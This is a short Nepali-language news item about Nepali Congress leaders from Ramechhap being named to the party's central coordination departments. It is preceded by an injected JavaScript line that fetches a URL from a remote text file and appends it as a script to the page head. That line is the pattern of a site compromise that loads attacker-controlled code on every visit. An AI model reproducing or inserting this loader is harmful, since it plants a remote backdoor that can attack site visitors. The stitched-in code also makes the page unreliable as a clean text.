;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
साउन २६,
रामेछाप । नेपाली कांग्रेस रामेछापका नेता भुवन खड्का कांग्रेस केन्द्रीय स्थानीय तह समन्वय विभागको सदस्यमा मनोनित भएका छन् । उनलाई पार्टीले रामेछापको स्थानीय तहको समन्वय गर्ने जिम्मेवारी दिएको हो । रामेछाप सुनापती गाउँपालिका–५ खनियापानी निवासी खडका कांग्रेस तरुण दलका पूर्व केन्द्रीय सदस्य एवं रामेछाप कांग्रेसका अध्यक्ष भइसकेका छन् ।
त्यस्तै खाँडादेवी गाउँ पालिकाका नेता नारायण कार्की तराइ मधेस समन्वय बिभागको सदस्य भएका छन् ।
त्यस्तै नेता रामकृष्ण ढुङ्गेल नेपाली कांग्रेस केन्द्रीय कार्यसमिति द्वारा गठित यातायात समन्वय बिभागको सदस्यको जिम्मेवारी पाएका छन् ।
फेसबुक प्रतिक्रियाहरु